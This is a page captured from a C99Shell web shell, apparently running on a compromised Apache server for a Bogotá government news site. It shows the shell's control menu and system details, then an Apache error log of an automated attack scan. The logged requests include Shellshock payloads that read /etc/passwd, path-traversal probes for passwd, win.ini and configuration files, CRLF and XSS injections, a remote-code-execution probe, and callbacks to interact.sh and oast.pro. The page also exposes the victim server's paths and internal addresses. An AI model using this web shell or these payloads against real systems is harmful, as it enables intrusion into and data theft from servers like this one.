!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 8.02 GB of 239.26 GB (3.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     error.2023.06.21.log (132.67 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
[Wed Jun 21 00:01:11.036305 2023] [core:error] [pid 13072:tid 18692] (20024)The given path is misformatted or contained invalid characters: [client 177.55.244.174:1628] AH00127: Cannot map GET /test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0 HTTP/1.1 to file
[Wed Jun 21 00:01:11.083105 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Jun 21 00:03:00.610897 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Jun 21 00:03:38.425364 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Jun 21 00:03:53.806991 2023] [cgi:error] [pid 13072:tid 18480] [client 177.55.244.174:1729] script not found or unable to stat: E:/nuevo/cgi-bin/admin.cgi
[Wed Jun 21 00:17:09.189988 2023] [cgi:error] [pid 13072:tid 20356] [client 177.55.244.174:2017] script not found or unable to stat: E:/nuevo/htdocs/noticias/index.asp
[Wed Jun 21 00:17:13.027594 2023] [cgi:error] [pid 13072:tid 20356] [client 177.55.244.174:1779] script not found or unable to stat: E:/nuevo/cgi-bin/status, referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Wed Jun 21 00:17:13.323995 2023] [cgi:error] [pid 13072:tid 20356] [client 177.55.244.174:1903] script not found or unable to stat: E:/nuevo/cgi-bin/stats, referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Wed Jun 21 00:17:13.589195 2023] [cgi:error] [pid 13072:tid 20356] [client 177.55.244.174:1613] script not found or unable to stat: E:/nuevo/cgi-bin/test, referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Wed Jun 21 00:17:13.932396 2023] [cgi:error] [pid 13072:tid 20356] [client 177.55.244.174:1998] script not found or unable to stat: E:/nuevo/cgi-bin/status, referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Wed Jun 21 00:17:14.197596 2023] [cgi:error] [pid 13072:tid 20356] [client 177.55.244.174:1821] script not found or unable to stat: E:/nuevo/htdocs/noticias/test.cgi, referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Wed Jun 21 00:17:14.462797 2023] [cgi:error] [pid 13072:tid 20356] [client 177.55.244.174:1926] script not found or unable to stat: E:/nuevo/htdocs/noticias/debug.cgi, referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Wed Jun 21 00:17:14.727997 2023] [cgi:error] [pid 13072:tid 20356] [client 177.55.244.174:1614] script not found or unable to stat: E:/nuevo/cgi-bin/test-cgi, referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Wed Jun 21 00:24:09.501526 2023] [cgi:error] [pid 13072:tid 18108] [client 177.55.244.174:2021] script not found or unable to stat: E:/nuevo/htdocs/noticias/spcgi.cgi
[Wed Jun 21 00:37:39.111748 2023] [cgi:error] [pid 13072:tid 18108] [client 177.55.244.174:1688] script not found or unable to stat: E:/nuevo/cgi-bin/Maconomy
[Wed Jun 21 00:39:23.663131 2023] [core:error] [pid 13072:tid 19180] [client 177.55.244.174:1574] AH00126: Invalid URI in request GET /../../../../WEB-INF/web.xml HTTP/1.1
[Wed Jun 21 00:39:23.928332 2023] [core:error] [pid 13072:tid 19180] [client 177.55.244.174:1668] AH00126: Invalid URI in request GET /../../../WEB-INF/web.xml HTTP/1.1
[Wed Jun 21 00:39:24.193532 2023] [core:error] [pid 13072:tid 19180] [client 177.55.244.174:1898] AH00126: Invalid URI in request GET /../../WEB-INF/web.xml HTTP/1.1
[Wed Jun 21 00:39:24.458733 2023] [core:error] [pid 13072:tid 19180] (22)Invalid argument: [client 177.55.244.174:1609] AH00127: Cannot map GET /%c0%ae/%c0%ae/WEB-INF/web.xml HTTP/1.1 to file
[Wed Jun 21 00:39:24.755133 2023] [core:error] [pid 13072:tid 19180] (22)Invalid argument: [client 177.55.244.174:1642] AH00127: Cannot map GET /%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml HTTP/1.1 to file
[Wed Jun 21 00:39:25.020334 2023] [core:error] [pid 13072:tid 19180] (22)Invalid argument: [client 177.55.244.174:1559] AH00127: Cannot map GET /%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml HTTP/1.1 to file
[Wed Jun 21 00:39:25.285534 2023] [core:error] [pid 13072:tid 19180] [client 177.55.244.174:1939] AH00126: Invalid URI in request GET /../../../WEB-INF/web.xml;x= HTTP/1.1
[Wed Jun 21 00:39:25.550735 2023] [core:error] [pid 13072:tid 19180] [client 177.55.244.174:1571] AH00126: Invalid URI in request GET /../../WEB-INF/web.xml;x= HTTP/1.1
[Wed Jun 21 00:39:25.815935 2023] [core:error] [pid 13072:tid 19180] [client 177.55.244.174:1855] AH00126: Invalid URI in request GET /../WEB-INF/web.xml;x= HTTP/1.1
[Wed Jun 21 00:39:26.611537 2023] [core:error] [pid 13072:tid 19180] [client 177.55.244.174:1915] AH00126: Invalid URI in request GET /../WEB-INF/web.xml HTTP/1.1
[Wed Jun 21 00:39:26.876737 2023] [core:error] [pid 13072:tid 19180] (22)Invalid argument: [client 177.55.244.174:1951] AH00127: Cannot map GET /%c0%ae/WEB-INF/web.xml HTTP/1.1 to file
[Wed Jun 21 00:45:05.069731 2023] [core:error] [pid 13072:tid 19424] [client 177.55.244.174:1912] AH00126: Invalid URI in request GET /../../etc/passwd HTTP/1.1
[Wed Jun 21 00:50:30.096302 2023] [cgi:error] [pid 13072:tid 18316] [client 177.55.244.174:1979] script not found or unable to stat: E:/nuevo/htdocs/noticias/tools.cgi, referer: http://noticias.ambientebogota.gov.co/tools.cgi
[Wed Jun 21 00:50:30.361502 2023] [cgi:error] [pid 13072:tid 18316] [client 177.55.244.174:1706] script not found or unable to stat: E:/nuevo/htdocs/noticias/tools.cgi, referer: http://noticias.ambientebogota.gov.co/tools.cgi
[Wed Jun 21 00:51:00.953156 2023] [core:error] [pid 13072:tid 19120] [client 177.55.244.174:1640] AH00126: Invalid URI in request GET /_next/../../../../../../../../../etc/passwd HTTP/1.1
[Wed Jun 21 00:53:44.971844 2023] [cgi:error] [pid 13072:tid 17892] [client 177.55.244.174:1979] script not found or unable to stat: E:/nuevo/cgi-bin/readycloud_control.cgi
[Wed Jun 21 00:54:15.828698 2023] [proxy:error] [pid 13072:tid 18108] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Wed Jun 21 00:54:15.828698 2023] [proxy:error] [pid 13072:tid 18108] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Wed Jun 21 00:54:15.828698 2023] [proxy_http:error] [pid 13072:tid 18108] [client 152.61.192.232:56167] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Wed Jun 21 00:54:16.109499 2023] [proxy:error] [pid 13072:tid 18108] AH00940: HTTP: disabled connection for (172.22.1.51)
[Wed Jun 21 00:54:16.421499 2023] [proxy:error] [pid 13072:tid 18108] AH00940: HTTP: disabled connection for (172.22.1.51)
[Wed Jun 21 00:54:48.604356 2023] [cgi:error] [pid 13072:tid 18316] [client 177.55.244.174:1723] script not found or unable to stat: E:/nuevo/htdocs/noticias/delsnap.pl
[Wed Jun 21 00:56:20.379317 2023] [cgi:error] [pid 13072:tid 18316] [client 177.55.244.174:1682] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Wed Jun 21 00:58:39.999562 2023] [cgi:error] [pid 13072:tid 17996] [client 177.55.244.174:1775] script not found or unable to stat: E:/nuevo/cgi-bin/kerbynet
[Wed Jun 21 01:15:00.820085 2023] [cgi:error] [pid 13072:tid 20912] [client 177.55.244.174:1901] script not found or unable to stat: E:/nuevo/cgi-bin/getagent.cgi
[Wed Jun 21 01:15:33.517743 2023] [cgi:error] [pid 13072:tid 20912] [client 177.55.244.174:1546] script not found or unable to stat: E:/nuevo/cgi-bin/nagios4
[Wed Jun 21 01:15:33.798543 2023] [cgi:error] [pid 13072:tid 20912] [client 177.55.244.174:1594] script not found or unable to stat: E:/nuevo/cgi-bin/nagios3
[Wed Jun 21 01:17:25.666340 2023] [cgi:error] [pid 13072:tid 17996] [client 177.55.244.174:1933] script not found or unable to stat: E:/nuevo/cgi-bin/log.cgi
[Wed Jun 21 01:18:33.854059 2023] [proxy:error] [pid 13072:tid 18108] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Wed Jun 21 01:18:33.854059 2023] [proxy:error] [pid 13072:tid 18108] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Wed Jun 21 01:18:33.854059 2023] [proxy_http:error] [pid 13072:tid 18108] [client 152.61.128.50:49291] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Wed Jun 21 01:18:34.103660 2023] [proxy:error] [pid 13072:tid 18108] AH00940: HTTP: disabled connection for (172.22.1.51)
[Wed Jun 21 01:18:34.368860 2023] [proxy:error] [pid 13072:tid 18108] AH00940: HTTP: disabled connection for (172.22.1.51)
[Wed Jun 21 01:20:20.324246 2023] [authz_core:error] [pid 13072:tid 18816] [client 177.55.244.174:1783] AH01630: client denied by server configuration: E:/nuevo/htdocs/noticias/server-status
[Wed Jun 21 01:20:50.822300 2023] [cgi:error] [pid 13072:tid 18816] [client 177.55.244.174:1598] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Wed Jun 21 01:22:01.365624 2023] [authz_core:error] [pid 13072:tid 18108] [client 177.55.244.174:1889] AH01630: client denied by server configuration: E:/nuevo/htdocs/noticias/.htaccess
[Wed Jun 21 01:31:58.363072 2023] [core:error] [pid 13072:tid 18292] [client 177.55.244.174:1584] AH00126: Invalid URI in request GET /public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
[Wed Jun 21 01:39:14.056238 2023] [core:error] [pid 13072:tid 19272] (20025)The given path contained wildcard characters: [client 177.55.244.174:1706] AH00036: access to /s=set&_method=__construct&method=*&filter[]=system failed (filesystem path 'E:/nuevo/htdocs/noticias/s=set&_method=__construct&method=*&filter[]=system')
[Wed Jun 21 01:42:58.431432 2023] [cgi:error] [pid 13072:tid 19272] [client 177.55.244.174:1835] script not found or unable to stat: E:/nuevo/cgi-bin/touchlist_sync.cgi
[Wed Jun 21 01:44:01.174742 2023] [cgi:error] [pid 13072:tid 18108] [client 177.55.244.174:1977] script not found or unable to stat: E:/nuevo/htdocs/noticias/mt.cgi
[Wed Jun 21 01:44:15.386367 2023] [cgi:error] [pid 13072:tid 19272] [client 177.55.244.174:1887] script not found or unable to stat: E:/nuevo/cgi-bin/webproc
[Wed Jun 21 01:45:54.664941 2023] [cgi:error] [pid 13072:tid 18108] [client 177.55.244.174:1691] script not found or unable to stat: E:/nuevo/cgi-bin/upload
[Wed Jun 21 01:46:22.978991 2023] [core:error] [pid 13072:tid 18108] [client 177.55.244.174:1911] AH00126: Invalid URI in request GET /../../../../../../../../windows/win.ini HTTP/1.1
[Wed Jun 21 01:49:11.740087 2023] [core:error] [pid 13072:tid 18640] [client 177.55.244.174:1687] AH00126: Invalid URI in request @tls-sni: noticias.ambientebogota.gov.co
[Wed Jun 21 01:50:33.827432 2023] [cgi:error] [pid 13072:tid 18244] [client 177.55.244.174:1549] script not found or unable to stat: E:/nuevo/cgi-bin/wwwctrl.cgi
[Wed Jun 21 01:52:20.469219 2023] [core:error] [pid 13072:tid 20912] [client 177.55.244.174:1847] AH00126: Invalid URI in request GET /loginLess/../../etc/passwd HTTP/1.1
[Wed Jun 21 01:56:46.730487 2023] [negotiation:error] [pid 13072:tid 18716] [client 177.55.244.174:1963] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Wed Jun 21 02:01:45.221411 2023] [cgi:error] [pid 13072:tid 18292] [client 177.55.244.174:1643] script not found or unable to stat: E:/nuevo/htdocs/noticias/certmngr.cgi
[Wed Jun 21 02:18:43.263599 2023] [core:error] [pid 13072:tid 18480] [client 177.55.244.174:1793] AH00126: Invalid URI in request GET /login/../../../etc/passwd HTTP/1.1
[Wed Jun 21 02:21:51.665130 2023] [core:error] [pid 13072:tid 18480] (20024)The given path is misformatted or contained invalid characters: [client 177.55.244.174:1886] AH00127: Cannot map GET /%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1 to file
[Wed Jun 21 02:27:30.903326 2023] [cgi:error] [pid 13072:tid 18292] [client 177.55.244.174:1614] script not found or unable to stat: E:/nuevo/htdocs/noticias/login.cgi
[Wed Jun 21 02:31:05.138502 2023] [core:error] [pid 13072:tid 19180] [client 177.55.244.174:1688] AH00126: Invalid URI in request GET /static/../../../a/../../../../etc/passwd HTTP/1.1
[Wed Jun 21 02:31:10.957312 2023] [cgi:error] [pid 13072:tid 19180] [client 177.55.244.174:1627] script not found or unable to stat: E:/nuevo/cgi-bin/login.cgi
[Wed Jun 21 02:57:03.425239 2023] [core:error] [pid 13072:tid 18316] (20024)The given path is misformatted or contained invalid characters: [client 177.55.244.174:2012] AH00127: Cannot map GET /%0A/interact.sh/ HTTP/1.1 to file
[Wed Jun 21 02:57:17.168863 2023] [cgi:error] [pid 13072:tid 19276] [client 177.55.244.174:1980] script not found or unable to stat: E:/nuevo/cgi-bin/config.exp
[Wed Jun 21 02:58:57.492639 2023] [core:error] [pid 13072:tid 18316] [client 177.55.244.174:1699] AH00126: Invalid URI in request GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
[Wed Jun 21 03:03:33.862725 2023] [cgi:error] [pid 13072:tid 20952] [client 177.55.244.174:1637] script not found or unable to stat: E:/nuevo/cgi-bin/manlist
[Wed Jun 21 03:08:37.829259 2023] [cgi:error] [pid 13072:tid 18316] [client 177.55.244.174:1773] script not found or unable to stat: E:/nuevo/cgi-bin/;cat$IFS
[Wed Jun 21 03:12:31.190068 2023] [cgi:error] [pid 13072:tid 18816] [client 177.55.244.174:1763] script not found or unable to stat: E:/nuevo/cgi-bin/supportInstaller
[Wed Jun 21 03:16:27.764484 2023] [cgi:error] [pid 13072:tid 19276] [client 177.55.244.174:1763] script not found or unable to stat: E:/nuevo/htdocs/noticias/awstats.pl
[Wed Jun 21 03:17:44.844219 2023] [cgi:error] [pid 13072:tid 17996] [client 177.55.244.174:1893] script not found or unable to stat: E:/nuevo/cgi-bin/wapopen
[Wed Jun 21 03:23:06.391984 2023] [authz_core:error] [pid 13072:tid 19080] [client 177.55.244.174:1960] AH01630: client denied by server configuration: E:/nuevo/htdocs/noticias/.htpasswd
[Wed Jun 21 03:24:12.317700 2023] [cgi:error] [pid 13072:tid 18716] [client 177.55.244.174:1599] script not found or unable to stat: E:/nuevo/cgi-bin/execute_cmd.cgi
[Wed Jun 21 03:25:05.685394 2023] [cgi:error] [pid 13072:tid 19180] [client 177.55.244.174:1547] script not found or unable to stat: E:/nuevo/htdocs/noticias/overview.asp
[Wed Jun 21 03:29:52.991098 2023] [core:error] [pid 13072:tid 18108] [client 177.55.244.174:1533] AH00126: Invalid URI in request GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
[Wed Jun 21 03:32:50.113809 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Jun 21 03:34:04.307540 2023] [cgi:error] [pid 13072:tid 18420] [client 177.55.244.174:1973] script not found or unable to stat: E:/nuevo/htdocs/noticias/hedwig.cgi
[Wed Jun 21 03:44:07.123799 2023] [proxy:error] [pid 13072:tid 18936] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Wed Jun 21 03:44:07.123799 2023] [proxy:error] [pid 13072:tid 18936] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Wed Jun 21 03:44:07.123799 2023] [proxy_http:error] [pid 13072:tid 18936] [client 177.55.244.174:1814] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Wed Jun 21 03:44:24.611429 2023] [core:error] [pid 13072:tid 18244] (20024)The given path is misformatted or contained invalid characters: [client 177.55.244.174:1640] AH00127: Cannot map GET /%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e HTTP/1.1 to file
[Wed Jun 21 03:48:47.549891 2023] [core:error] [pid 13072:tid 20912] [client 177.55.244.174:1618] AH00126: Invalid URI in request GET @ci94um9enjj08h40kvogmo6egnythg3dj.oast.pro/ HTTP/1.1
[Wed Jun 21 03:48:47.815092 2023] [core:error] [pid 13072:tid 20912] [client 177.55.244.174:1848] AH00126: Invalid URI in request GET ci94um9enjj08h40kvogpo51oifg8ta55.oast.pro:80/ HTTP/1.1
[Wed Jun 21 03:51:10.555342 2023] [cgi:error] [pid 13072:tid 18244] [client 177.55.244.174:1708] script not found or unable to stat: E:/nuevo/cgi-bin/mesh.cgi
[Wed Jun 21 03:55:18.611378 2023] [authz_core:error] [pid 13072:tid 20912] [client 177.55.244.174:1728] AH01630: client denied by server configuration: E:/nuevo/htdocs/noticias/phpMyAdmin
[Wed Jun 21 03:55:18.876578 2023] [authz_core:error] [pid 13072:tid 20912] [client 177.55.244.174:1718] AH01630: client denied by server configuration: E:/nuevo/phpMyAdmin/index.php
[Wed Jun 21 03:56:14.802677 2023] [negotiation:error] [pid 13072:tid 19272] [client 177.55.244.174:1917] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_METHOD_NOT_ALLOWED.html.var
[Wed Jun 21 03:57:15.907984 2023] [cgi:error] [pid 13072:tid 18244] [client 177.55.244.174:1642] script not found or unable to stat: E:/nuevo/cgi-bin/webproc
[Wed Jun 21 03:59:46.105048 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Jun 21 04:01:55.975276 2023] [cgi:error] [pid 13072:tid 18880] [client 177.55.244.174:1945] script not found or unable to stat: E:/nuevo/htdocs/noticias/index.asp
[Wed Jun 21 04:03:08.172203 2023] [cgi:error] [pid 13072:tid 18244] [client 177.55.244.174:1639] script not found or unable to stat: E:/nuevo/htdocs/noticias/WEBACCOUNT.CGI
[Wed Jun 21 04:17:11.665684 2023] [cgi:error] [pid 13072:tid 18692] [client 177.55.244.174:1871] script not found or unable to stat: E:/nuevo/cgi-bin/awstats
[Wed Jun 21 04:33:13.048573 2023] [cgi:error] [pid 13072:tid 18640] [client 177.55.244.174:1721] script not found or unable to stat: E:/nuevo/cgi-bin/kerbynet
[Wed Jun 21 04:38:23.426718 2023] [cgi:error] [pid 13072:tid 18880] [client 177.55.244.174:1661] script not found or unable to stat: E:/nuevo/htdocs/noticias/login.asp
[Wed Jun 21 04:42:48.315183 2023] [core:error] [pid 13072:tid 18880] [client 177.55.244.174:1705] AH00126: Invalid URI in request GET /../../../../../../../../../etc/passwd HTTP/1.1
[Wed Jun 21 04:48:02.156534 2023] [core:error] [pid 13072:tid 20952] [client 177.55.244.174:1977] AH00126: Invalid URI in request GET /asd/../../../../../../../../etc/passwd HTTP/1.1
[Wed Jun 21 04:51:21.166084 2023] [cgi:error] [pid 13072:tid 18880] [client 177.55.244.174:1969] script not found or unable to stat: E:/nuevo/htdocs/noticias/passwordrecovered.cgi
[Wed Jun 21 04:53:03.439864 2023] [core:error] [pid 13072:tid 19120] (20024)The given path is misformatted or contained invalid characters: [client 177.55.244.174:1914] AH00127: Cannot map GET /lucees3ezf%3cimg%20src%3da%20onerror%3dalert('2RUgEiLAy1ucoAiTAyWZ9ku5UFx')%3elujb7/admin/imgProcess.cfm HTTP/1.1 to file
[Wed Jun 21 04:56:58.298276 2023] [core:error] [pid 13072:tid 18316] [client 177.55.244.174:1781] AH00126: Invalid URI in request GET /../../../../../../../../../../../../etc/passwd HTTP/1.1
[Wed Jun 21 04:57:15.692307 2023] [cgi:error] [pid 13072:tid 18316] [client 177.55.244.174:1798] script not found or unable to stat: E:/nuevo/htdocs/noticias/gotoURL.asp
[Wed Jun 21 04:59:01.023692 2023] [cgi:error] [pid 13072:tid 18904] [client 177.55.244.174:1633] script not found or unable to stat: E:/nuevo/cgi-bin/ck
[Wed Jun 21 04:59:29.072541 2023] [cgi:error] [pid 13072:tid 18904] [client 177.55.244.174:1571] script not found or unable to stat: E:/nuevo/cgi-bin/login.cgi, referer: http://noticias.ambientebogota.gov.co
[Wed Jun 21 04:59:32.364147 2023] [cgi:error] [pid 13072:tid 17892] [client 177.55.244.174:1801] script not found or unable to stat: E:/nuevo/cgi-bin/system_log.cgi
[Wed Jun 21 05:04:26.019062 2023] [core:error] [pid 13072:tid 17996] (20024)The given path is misformatted or contained invalid characters: [client 177.55.244.174:1617] AH00127: Cannot map GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1 to file
[Wed Jun 21 05:04:26.284263 2023] [core:error] [pid 13072:tid 17996] (20024)The given path is misformatted or contained invalid characters: [client 177.55.244.174:1655] AH00127: Cannot map GET /.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1 to file
[Wed Jun 21 05:04:45.846697 2023] [proxy:error] [pid 13072:tid 17996] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: AJP: attempt to connect to 127.0.0.1:8009 (*) failed
[Wed Jun 21 05:04:45.846697 2023] [proxy_ajp:error] [pid 13072:tid 17996] [client 177.55.244.174:1865] AH00896: failed to make connection to backend: 127.0.0.1
[Wed Jun 21 05:13:18.791198 2023] [cgi:error] [pid 13072:tid 19276] [client 177.55.244.174:1842] script not found or unable to stat: E:/nuevo/htdocs/noticias/log_download.cgi
[Wed Jun 21 05:13:19.071999 2023] [cgi:error] [pid 13072:tid 19276] [client 177.55.244.174:1907] script not found or unable to stat: E:/nuevo/htdocs/noticias/log_download.cgi
[Wed Jun 21 05:14:14.576896 2023] [cgi:error] [pid 13072:tid 18904] [client 177.55.244.174:1894] script not found or unable to stat: E:/nuevo/cgi-bin/rpc
[Wed Jun 21 05:22:55.649011 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Jun 21 05:25:18.997663 2023] [cgi:error] [pid 13072:tid 17996] [client 177.55.244.174:1968] script not found or unable to stat: E:/nuevo/cgi-bin/ExportLogs.sh
[Wed Jun 21 05:26:23.098176 2023] [cgi:error] [pid 13072:tid 17996] [client 177.55.244.174:1874] script not found or unable to stat: E:/nuevo/cgi-bin/koha
[Wed Jun 21 05:31:36.487126 2023] [core:error] [pid 13072:tid 18936] [client 177.55.244.174:1870] AH00135: Invalid method in request DEBUG /Foobar-debug.aspx HTTP/1.1
[Wed Jun 21 05:38:49.278686 2023] [cgi:error] [pid 13072:tid 20912] [client 177.55.244.174:1688] script not found or unable to stat: E:/nuevo/cgi-bin/login.cgi
[Wed Jun 21 05:39:11.305925 2023] [cgi:error] [pid 13072:tid 18716] [client 177.55.244.174:1853] script not found or unable to stat: E:/nuevo/cgi-bin/test
[Wed Jun 21 05:41:04.702524 2023] [cgi:error] [pid 13072:tid 18936] [client 177.55.244.174:1776] script not found or unable to stat: E:/nuevo/cgi-bin/libagent.cgi
[Wed Jun 21 05:46:01.446245 2023] [cgi:error] [pid 13072:tid 18936] [client 177.55.244.174:1828] script not found or unable to stat: E:/nuevo/cgi-bin/broker
[Wed Jun 21 05:47:03.331554 2023] [cgi:error] [pid 13072:tid 18816] [client 177.55.244.174:2020] script not found or unable to stat: E:/nuevo/cgi-bin/mainfunction.cgi
[Wed Jun 21 05:51:51.651261 2023] [proxy:error] [pid 13072:tid 17996] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: AJP: attempt to connect to 127.0.0.1:8009 (*) failed
[Wed Jun 21 05:51:51.651261 2023] [proxy_ajp:error] [pid 13072:tid 17996] [client 177.55.244.174:2028] AH00896: failed to make connection to backend: 127.0.0.1
[Wed Jun 21 05:51:52.930463 2023] [proxy:error] [pid 13072:tid 17996] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: AJP: attempt to connect to 127.0.0.1:8009 (*) failed
[Wed Jun 21 05:51:52.930463 2023] [proxy_ajp:error] [pid 13072:tid 17996] [client 177.55.244.174:1648] AH00896: failed to make connection to backend: 127.0.0.1
[Wed Jun 21 05:51:54.209665 2023] [proxy:error] [pid 13072:tid 20952] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: AJP: attempt to connect to 127.0.0.1:8009 (*) failed
[Wed Jun 21 05:51:54.209665 2023] [proxy_ajp:error] [pid 13072:tid 20952] [client 177.55.244.174:1702] AH00896: failed to make connection to backend: 127.0.0.1
[Wed Jun 21 05:51:55.488867 2023] [proxy:error] [pid 13072:tid 20952] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: AJP: attempt to connect to 127.0.0.1:8009 (*) failed
[Wed Jun 21 05:51:55.488867 2023] [proxy_ajp:error] [pid 13072:tid 20952] [client 177.55.244.174:1950] AH00896: failed to make connection to backend: 127.0.0.1
[Wed Jun 21 05:57:38.237069 2023] [cgi:error] [pid 13072:tid 18816] [client 177.55.244.174:1814] script not found or unable to stat: E:/nuevo/cgi-bin/printenv
[Wed Jun 21 05:58:08.298322 2023] [core:error] [pid 13072:tid 17996] [client 177.55.244.174:1641] AH00126: Invalid URI in request GET \\..\\..\\..\\..\\Windows\\win.ini HTTP/1.1
[Wed Jun 21 06:10:30.188825 2023] [cgi:error] [pid 13072:tid 18816] [client 177.55.244.174:1788] script not found or unable to stat: E:/nuevo/cgi-bin/common
[Wed Jun 21 06:10:56.802472 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Jun 21 06:22:15.778064 2023] [mpm_winnt:warn] [pid 13072:tid 21944] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Jun 21 06:33:46.812478 2023] [core:error] [pid 13072:tid 18640] [client 177.55.244.174:1641] AH00126: Invalid URI in request GET /public/plugins/dalmatinerdb-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.843678 2023] [core:error] [pid 13072:tid 17996] [client 177.55.244.174:1699] AH00126: Invalid URI in request GET /public/plugins/akumuli-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.843678 2023] [core:error] [pid 13072:tid 19276] [client 177.55.244.174:1645] AH00126: Invalid URI in request GET /public/plugins/alertlist/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.843678 2023] [core:error] [pid 13072:tid 20356] [client 177.55.244.174:1570] AH00126: Invalid URI in request GET /public/plugins/agenty-flowcharting-panel/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.843678 2023] [core:error] [pid 13072:tid 18816] [client 177.55.244.174:1967] AH00126: Invalid URI in request GET /public/plugins/alexanderzobnin-zabbix-app/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.843678 2023] [core:error] [pid 13072:tid 18904] [client 177.55.244.174:1697] AH00126: Invalid URI in request GET /public/plugins/aceiot-svg-panel/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.843678 2023] [core:error] [pid 13072:tid 18108] [client 177.55.244.174:1615] AH00126: Invalid URI in request GET /public/plugins/abhisant-druid-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.843678 2023] [core:error] [pid 13072:tid 18480] [client 177.55.244.174:1701] AH00126: Invalid URI in request GET /public/plugins/andig-darksky-datasource/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.859278 2023] [core:error] [pid 13072:tid 18692] [client 177.55.244.174:1574] AH00126: Invalid URI in request GET /public/plugins/alexandra-trackmap-panel/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.859278 2023] [core:error] [pid 13072:tid 20952] [client 177.55.244.174:1961] AH00126: Invalid URI in request GET /public/plugins/annolist/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.859278 2023] [core:error] [pid 13072:tid 19168] [client 177.55.244.174:1700] AH00126: Invalid URI in request GET /public/plugins/alertmanager/../../../../../conf/defaults.ini HTTP/1.1
[Wed Jun 21 06:33:46.859278 2023] [core:error] [pid 13072:tid 19248] [client 177.55.244.174:1722] AH00126: Invalid URI in request GET /public/plugins/aquaqanalytics-kdbbackend-datasource/../../../../../conf/defaults.ini HTTP/1.1
